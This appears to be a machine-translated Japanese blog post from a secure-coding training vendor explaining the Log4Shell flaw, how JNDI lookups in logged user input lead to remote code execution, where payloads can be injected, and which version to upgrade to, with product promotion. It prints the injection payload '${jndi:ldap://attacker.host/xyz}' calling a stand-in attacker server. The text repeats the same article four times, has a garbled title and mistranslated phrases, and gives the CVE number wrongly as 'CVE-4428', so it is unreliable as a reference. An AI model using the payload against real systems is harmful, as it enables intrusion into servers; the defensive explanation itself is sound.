Log4jの近親相-v788とその近く
12月9日、JavaライブラリLog4jのゼロデイエクスプロイトが公開されました。 CVE-4428、吹き替え ログ 4 シェル、このエクスプロイトによりリモートでコードが実行される可能性があるため、「重大度高」という評価を受けました(レース)。さらに、log4j-core は最も一般的な Java ロギングライブラリの 1 つであるため、何百万ものアプリケーションが危険にさらされます。
Log4Shellに取り組むスキルをすばやくレベルアップしたいですか?
Log4Shellの基本的な考え方から、Missionと呼ばれるシミュレーターでこの脆弱性の悪用を体験できるショーケースを構築しました。このミッションでは、Log4j の脆弱性がインフラストラクチャーやアプリケーションにどのように影響するかを順を追って説明します。 ショーケースに直接移動するには、ここをクリックしてくださいまたは、引き続き読み進めて脆弱性の詳細を確認してください。
古いニュース?
このエクスプロイトは新しいものではありません。セキュリティ研究者は 2016 年の BlackHat トークですでに発表しています。 アルバロ・ムニョスとオレクサンドル・ミロシュ それを強調しました。」アプリケーションでは、信頼できないデータを使用して JNDI ルックアップを実行すべきではありません」と、ターゲットを絞ったJNDI/LDAPインジェクションがどのようにリモートコード実行につながるかを説明しました。そして、これこそまさに Log4Shell の中核にあるものです。
攻撃ベクトル
Log4Shell のインジェクションペイロードは次のようになります。
$ {jndi: ldap: //attacker.host/xyz}
これを理解するには、Java の表現言語 (EL) について知る必要があります。次の構文で記述された式: $ {expr} 実行時に評価されます。たとえば、$ {java: version} は使用されている Java バージョンを返します。
次に、JNDI、または Java ネーミングとディレクトリインターフェイスは、LDAP、DNS、RMI などのプロトコルを使用してサービスに接続し、データまたはリソースを取得できるようにする API です。簡単に言うと、前述の悪意のあるペイロードの例では、JNDI は攻撃者が制御する LDAP サーバーを検索します。たとえば、その応答が悪意のあるコードを含む Java クラスファイルを指していて、そのコードが脆弱なサーバー上で実行されてしまう可能性があります。
この脆弱性が大きな問題となっているのは、Log4j がすべてのログエントリを評価し、「jndi」というプレフィックスが付いた EL 構文で記述されたすべてのログユーザー入力を検索するためです。ペイロードは、フォームフィールドなど、ユーザーがデータを入力できる場所ならどこにでも挿入できます。また、次のような HTTP ヘッダーもあります。 ユーザーエージェント そして X-Forwarded-For、およびその他のヘッダーは、ペイロードを伝送するようにカスタマイズできます。
このエクスプロイトを自分で体験するには、 ショーケースに進み、ステップ2「エクスペリエンス・インパクト」に飛び込んでください。
予防:意識
Log4jは脆弱なコードにパッチを当てているため、アップグレードはすべてのアプリケーションに推奨されます。ただし、バージョン 2.15.0 と 2.16.0 には DDoS やその他の脆弱性が含まれていたため、12 月下旬の時点で 2.17.0 へのアップグレードが推奨されています。
コードを書く開発者は、常にセキュリティを考慮する必要があります。Log4Shell は、サードパーティのフレームワークやライブラリを使用するときにはリスクが伴うことを教えてくれました。私たちは、単純に安全だと思い込んでいる外部ソースを使うことで、アプリケーションのセキュリティが危険にさらされる可能性があることを認識しておく必要があります。
この脆弱性を防ぐことはできましたか?はい、いいえ。一方で、開発者ができることは脆弱なコンポーネントがサードパーティのソフトウェアから導入されている場合に限られます。一方、このことから学んだ教訓は何度も繰り返されてきたものです。つまり、ユーザーの入力を決して信用しないということです。
Secure Code Warriorは、セキュリティ志向の開発者がコードの脆弱性を防ぐ最善の方法であると考えています。SCW はプログラミングフレームワークに特化したトレーニングを大規模に提供しているため、企業のお客様は、レポートデータを利用することで、影響を受けた Java 開発者を迅速に特定できるようになりました。また、Log4j のアップグレードを加速させるために、SCW のトレーニングを受けたセキュリティチャンピオンに頼っていました。
特にJava開発者のために、セキュア・コード・ウォリアーは無料のIntelliJプラグインであるSenseiを提供しています。このルールベースのコード分析ツールを使用すると、コーディングガイドラインを適用したり、脆弱性を防いだり修正したりできます。独自のルールを作成することも、既製のルールを使用することもできます。 クックブック。当社を閲覧してください レシピ、そして私たちのダウンロードを忘れないでください Log4j クックブック これにより、Log4Shellの脆弱性を瞬時に見つけて修正できます。
Log4Shell に対する防御のスキルをレベルアップさせましょう
このブログ投稿で学んだことを実践することに興味がありますか?私たちのショーケースが役に立ちます。ショーケースの開始時に、この脆弱性を簡単に確認した後、シミュレートされた環境に移動し、ガイド付きの指示に従ってエクスプロイトを試してみることができます。
Secure Code Warriorは、ソフトウェア開発ライフサイクル全体にわたってコードを保護し、サイバーセキュリティを最優先とする文化を築くお手伝いをします。アプリケーションセキュリティマネージャ、開発者、CISO、またはセキュリティ関係者のいずれであっても、安全でないコードに関連するリスクを軽減するお手伝いをします。
デモを予約
Laura Verheydeは、Secure Code Warriorのソフトウェア開発者で、ミッションラボとコーディングラボ向けの脆弱性の調査とコンテンツの作成に注力しています。
12月9日、JavaライブラリLog4jのゼロデイエクスプロイトが公開されました。 CVE-4428、吹き替え ログ 4 シェル、このエクスプロイトによりリモートでコードが実行される可能性があるため、「重大度高」という評価を受けました(レース)。さらに、log4j-core は最も一般的な Java ロギングライブラリの 1 つであるため、何百万ものアプリケーションが危険にさらされます。
Log4Shellに取り組むスキルをすばやくレベルアップしたいですか?
Log4Shellの基本的な考え方から、Missionと呼ばれるシミュレーターでこの脆弱性の悪用を体験できるショーケースを構築しました。このミッションでは、Log4j の脆弱性がインフラストラクチャーやアプリケーションにどのように影響するかを順を追って説明します。 ショーケースに直接移動するには、ここをクリックしてくださいまたは、引き続き読み進めて脆弱性の詳細を確認してください。
古いニュース?
このエクスプロイトは新しいものではありません。セキュリティ研究者は 2016 年の BlackHat トークですでに発表しています。 アルバロ・ムニョスとオレクサンドル・ミロシュ それを強調しました。」アプリケーションでは、信頼できないデータを使用して JNDI ルックアップを実行すべきではありません」と、ターゲットを絞ったJNDI/LDAPインジェクションがどのようにリモートコード実行につながるかを説明しました。そして、これこそまさに Log4Shell の中核にあるものです。
攻撃ベクトル
Log4Shell のインジェクションペイロードは次のようになります。
$ {jndi: ldap: //attacker.host/xyz}
これを理解するには、Java の表現言語 (EL) について知る必要があります。次の構文で記述された式: $ {expr} 実行時に評価されます。たとえば、$ {java: version} は使用されている Java バージョンを返します。
次に、JNDI、または Java ネーミングとディレクトリインターフェイスは、LDAP、DNS、RMI などのプロトコルを使用してサービスに接続し、データまたはリソースを取得できるようにする API です。簡単に言うと、前述の悪意のあるペイロードの例では、JNDI は攻撃者が制御する LDAP サーバーを検索します。たとえば、その応答が悪意のあるコードを含む Java クラスファイルを指していて、そのコードが脆弱なサーバー上で実行されてしまう可能性があります。
この脆弱性が大きな問題となっているのは、Log4j がすべてのログエントリを評価し、「jndi」というプレフィックスが付いた EL 構文で記述されたすべてのログユーザー入力を検索するためです。ペイロードは、フォームフィールドなど、ユーザーがデータを入力できる場所ならどこにでも挿入できます。また、次のような HTTP ヘッダーもあります。 ユーザーエージェント そして X-Forwarded-For、およびその他のヘッダーは、ペイロードを伝送するようにカスタマイズできます。
このエクスプロイトを自分で体験するには、 ショーケースに進み、ステップ2「エクスペリエンス・インパクト」に飛び込んでください。
予防:意識
Log4jは脆弱なコードにパッチを当てているため、アップグレードはすべてのアプリケーションに推奨されます。ただし、バージョン 2.15.0 と 2.16.0 には DDoS やその他の脆弱性が含まれていたため、12 月下旬の時点で 2.17.0 へのアップグレードが推奨されています。
コードを書く開発者は、常にセキュリティを考慮する必要があります。Log4Shell は、サードパーティのフレームワークやライブラリを使用するときにはリスクが伴うことを教えてくれました。私たちは、単純に安全だと思い込んでいる外部ソースを使うことで、アプリケーションのセキュリティが危険にさらされる可能性があることを認識しておく必要があります。
この脆弱性を防ぐことはできましたか?はい、いいえ。一方で、開発者ができることは脆弱なコンポーネントがサードパーティのソフトウェアから導入されている場合に限られます。一方、このことから学んだ教訓は何度も繰り返されてきたものです。つまり、ユーザーの入力を決して信用しないということです。
Secure Code Warriorは、セキュリティ志向の開発者がコードの脆弱性を防ぐ最善の方法であると考えています。SCW はプログラミングフレームワークに特化したトレーニングを大規模に提供しているため、企業のお客様は、レポートデータを利用することで、影響を受けた Java 開発者を迅速に特定できるようになりました。また、Log4j のアップグレードを加速させるために、SCW のトレーニングを受けたセキュリティチャンピオンに頼っていました。
特にJava開発者のために、セキュア・コード・ウォリアーは無料のIntelliJプラグインであるSenseiを提供しています。このルールベースのコード分析ツールを使用すると、コーディングガイドラインを適用したり、脆弱性を防いだり修正したりできます。独自のルールを作成することも、既製のルールを使用することもできます。 クックブック。当社を閲覧してください レシピ、そして私たちのダウンロードを忘れないでください Log4j クックブック これにより、Log4Shellの脆弱性を瞬時に見つけて修正できます。
Log4Shell に対する防御のスキルをレベルアップさせましょう
このブログ投稿で学んだことを実践することに興味がありますか?私たちのショーケースが役に立ちます。ショーケースの開始時に、この脆弱性を簡単に確認した後、シミュレートされた環境に移動し、ガイド付きの指示に従ってエクスプロイトを試してみることができます。
12月9日、JavaライブラリLog4jのゼロデイエクスプロイトが公開されました。 CVE-4428、吹き替え ログ 4 シェル、このエクスプロイトによりリモートでコードが実行される可能性があるため、「重大度高」という評価を受けました(レース)。さらに、log4j-core は最も一般的な Java ロギングライブラリの 1 つであるため、何百万ものアプリケーションが危険にさらされます。
Log4Shellに取り組むスキルをすばやくレベルアップしたいですか?
Log4Shellの基本的な考え方から、Missionと呼ばれるシミュレーターでこの脆弱性の悪用を体験できるショーケースを構築しました。このミッションでは、Log4j の脆弱性がインフラストラクチャーやアプリケーションにどのように影響するかを順を追って説明します。 ショーケースに直接移動するには、ここをクリックしてくださいまたは、引き続き読み進めて脆弱性の詳細を確認してください。
古いニュース?
このエクスプロイトは新しいものではありません。セキュリティ研究者は 2016 年の BlackHat トークですでに発表しています。 アルバロ・ムニョスとオレクサンドル・ミロシュ それを強調しました。」アプリケーションでは、信頼できないデータを使用して JNDI ルックアップを実行すべきではありません」と、ターゲットを絞ったJNDI/LDAPインジェクションがどのようにリモートコード実行につながるかを説明しました。そして、これこそまさに Log4Shell の中核にあるものです。
攻撃ベクトル
Log4Shell のインジェクションペイロードは次のようになります。
$ {jndi: ldap: //attacker.host/xyz}
これを理解するには、Java の表現言語 (EL) について知る必要があります。次の構文で記述された式: $ {expr} 実行時に評価されます。たとえば、$ {java: version} は使用されている Java バージョンを返します。
次に、JNDI、または Java ネーミングとディレクトリインターフェイスは、LDAP、DNS、RMI などのプロトコルを使用してサービスに接続し、データまたはリソースを取得できるようにする API です。簡単に言うと、前述の悪意のあるペイロードの例では、JNDI は攻撃者が制御する LDAP サーバーを検索します。たとえば、その応答が悪意のあるコードを含む Java クラスファイルを指していて、そのコードが脆弱なサーバー上で実行されてしまう可能性があります。
この脆弱性が大きな問題となっているのは、Log4j がすべてのログエントリを評価し、「jndi」というプレフィックスが付いた EL 構文で記述されたすべてのログユーザー入力を検索するためです。ペイロードは、フォームフィールドなど、ユーザーがデータを入力できる場所ならどこにでも挿入できます。また、次のような HTTP ヘッダーもあります。 ユーザーエージェント そして X-Forwarded-For、およびその他のヘッダーは、ペイロードを伝送するようにカスタマイズできます。
このエクスプロイトを自分で体験するには、 ショーケースに進み、ステップ2「エクスペリエンス・インパクト」に飛び込んでください。
予防:意識
Log4jは脆弱なコードにパッチを当てているため、アップグレードはすべてのアプリケーションに推奨されます。ただし、バージョン 2.15.0 と 2.16.0 には DDoS やその他の脆弱性が含まれていたため、12 月下旬の時点で 2.17.0 へのアップグレードが推奨されています。
コードを書く開発者は、常にセキュリティを考慮する必要があります。Log4Shell は、サードパーティのフレームワークやライブラリを使用するときにはリスクが伴うことを教えてくれました。私たちは、単純に安全だと思い込んでいる外部ソースを使うことで、アプリケーションのセキュリティが危険にさらされる可能性があることを認識しておく必要があります。
この脆弱性を防ぐことはできましたか?はい、いいえ。一方で、開発者ができることは脆弱なコンポーネントがサードパーティのソフトウェアから導入されている場合に限られます。一方、このことから学んだ教訓は何度も繰り返されてきたものです。つまり、ユーザーの入力を決して信用しないということです。
Secure Code Warriorは、セキュリティ志向の開発者がコードの脆弱性を防ぐ最善の方法であると考えています。SCW はプログラミングフレームワークに特化したトレーニングを大規模に提供しているため、企業のお客様は、レポートデータを利用することで、影響を受けた Java 開発者を迅速に特定できるようになりました。また、Log4j のアップグレードを加速させるために、SCW のトレーニングを受けたセキュリティチャンピオンに頼っていました。
特にJava開発者のために、セキュア・コード・ウォリアーは無料のIntelliJプラグインであるSenseiを提供しています。このルールベースのコード分析ツールを使用すると、コーディングガイドラインを適用したり、脆弱性を防いだり修正したりできます。独自のルールを作成することも、既製のルールを使用することもできます。 クックブック。当社を閲覧してください レシピ、そして私たちのダウンロードを忘れないでください Log4j クックブック これにより、Log4Shellの脆弱性を瞬時に見つけて修正できます。
Log4Shell に対する防御のスキルをレベルアップさせましょう
このブログ投稿で学んだことを実践することに興味がありますか?私たちのショーケースが役に立ちます。ショーケースの開始時に、この脆弱性を簡単に確認した後、シミュレートされた環境に移動し、ガイド付きの指示に従ってエクスプロイトを試してみることができます。
以下のリンクをクリックして、このリソースのPDFをダウンロードしてください。
Secure Code Warriorは、ソフトウェア開発ライフサイクル全体にわたってコードを保護し、サイバーセキュリティを最優先とする文化を築くお手伝いをします。アプリケーションセキュリティマネージャ、開発者、CISO、またはセキュリティ関係者のいずれであっても、安全でないコードに関連するリスクを軽減するお手伝いをします。
レポートを表示デモを予約
Laura Verheydeは、Secure Code Warriorのソフトウェア開発者で、ミッションラボとコーディングラボ向けの脆弱性の調査とコンテンツの作成に注力しています。
12月9日、JavaライブラリLog4jのゼロデイエクスプロイトが公開されました。 CVE-4428、吹き替え ログ 4 シェル、このエクスプロイトによりリモートでコードが実行される可能性があるため、「重大度高」という評価を受けました(レース)。さらに、log4j-core は最も一般的な Java ロギングライブラリの 1 つであるため、何百万ものアプリケーションが危険にさらされます。
Log4Shellに取り組むスキルをすばやくレベルアップしたいですか?
Log4Shellの基本的な考え方から、Missionと呼ばれるシミュレーターでこの脆弱性の悪用を体験できるショーケースを構築しました。このミッションでは、Log4j の脆弱性がインフラストラクチャーやアプリケーションにどのように影響するかを順を追って説明します。 ショーケースに直接移動するには、ここをクリックしてくださいまたは、引き続き読み進めて脆弱性の詳細を確認してください。
古いニュース?
このエクスプロイトは新しいものではありません。セキュリティ研究者は 2016 年の BlackHat トークですでに発表しています。 アルバロ・ムニョスとオレクサンドル・ミロシュ それを強調しました。」アプリケーションでは、信頼できないデータを使用して JNDI ルックアップを実行すべきではありません」と、ターゲットを絞ったJNDI/LDAPインジェクションがどのようにリモートコード実行につながるかを説明しました。そして、これこそまさに Log4Shell の中核にあるものです。
攻撃ベクトル
Log4Shell のインジェクションペイロードは次のようになります。
$ {jndi: ldap: //attacker.host/xyz}
これを理解するには、Java の表現言語 (EL) について知る必要があります。次の構文で記述された式: $ {expr} 実行時に評価されます。たとえば、$ {java: version} は使用されている Java バージョンを返します。
次に、JNDI、または Java ネーミングとディレクトリインターフェイスは、LDAP、DNS、RMI などのプロトコルを使用してサービスに接続し、データまたはリソースを取得できるようにする API です。簡単に言うと、前述の悪意のあるペイロードの例では、JNDI は攻撃者が制御する LDAP サーバーを検索します。たとえば、その応答が悪意のあるコードを含む Java クラスファイルを指していて、そのコードが脆弱なサーバー上で実行されてしまう可能性があります。
この脆弱性が大きな問題となっているのは、Log4j がすべてのログエントリを評価し、「jndi」というプレフィックスが付いた EL 構文で記述されたすべてのログユーザー入力を検索するためです。ペイロードは、フォームフィールドなど、ユーザーがデータを入力できる場所ならどこにでも挿入できます。また、次のような HTTP ヘッダーもあります。 ユーザーエージェント そして X-Forwarded-For、およびその他のヘッダーは、ペイロードを伝送するようにカスタマイズできます。
このエクスプロイトを自分で体験するには、 ショーケースに進み、ステップ2「エクスペリエンス・インパクト」に飛び込んでください。
予防:意識
Log4jは脆弱なコードにパッチを当てているため、アップグレードはすべてのアプリケーションに推奨されます。ただし、バージョン 2.15.0 と 2.16.0 には DDoS やその他の脆弱性が含まれていたため、12 月下旬の時点で 2.17.0 へのアップグレードが推奨されています。
コードを書く開発者は、常にセキュリティを考慮する必要があります。Log4Shell は、サードパーティのフレームワークやライブラリを使用するときにはリスクが伴うことを教えてくれました。私たちは、単純に安全だと思い込んでいる外部ソースを使うことで、アプリケーションのセキュリティが危険にさらされる可能性があることを認識しておく必要があります。
この脆弱性を防ぐことはできましたか?はい、いいえ。一方で、開発者ができることは脆弱なコンポーネントがサードパーティのソフトウェアから導入されている場合に限られます。一方、このことから学んだ教訓は何度も繰り返されてきたものです。つまり、ユーザーの入力を決して信用しないということです。
Secure Code Warriorは、セキュリティ志向の開発者がコードの脆弱性を防ぐ最善の方法であると考えています。SCW はプログラミングフレームワークに特化したトレーニングを大規模に提供しているため、企業のお客様は、レポートデータを利用することで、影響を受けた Java 開発者を迅速に特定できるようになりました。また、Log4j のアップグレードを加速させるために、SCW のトレーニングを受けたセキュリティチャンピオンに頼っていました。
特にJava開発者のために、セキュア・コード・ウォリアーは無料のIntelliJプラグインであるSenseiを提供しています。このルールベースのコード分析ツールを使用すると、コーディングガイドラインを適用したり、脆弱性を防いだり修正したりできます。独自のルールを作成することも、既製のルールを使用することもできます。 クックブック。当社を閲覧してください レシピ、そして私たちのダウンロードを忘れないでください Log4j クックブック これにより、Log4Shellの脆弱性を瞬時に見つけて修正できます。
Log4Shell に対する防御のスキルをレベルアップさせましょう
このブログ投稿で学んだことを実践することに興味がありますか?私たちのショーケースが役に立ちます。ショーケースの開始時に、この脆弱性を簡単に確認した後、シミュレートされた環境に移動し、ガイド付きの指示に従ってエクスプロイトを試してみることができます。
始めるためのリソース
%20(1).avif)
.avif)
Threat Modeling with AI: Turning Every Developer into a Threat Modeler
Walk away better equipped to help developers combine threat modeling ideas and techniques with the AI tools they're already using to strengthen security, improve collaboration, and build more resilient software from the start.
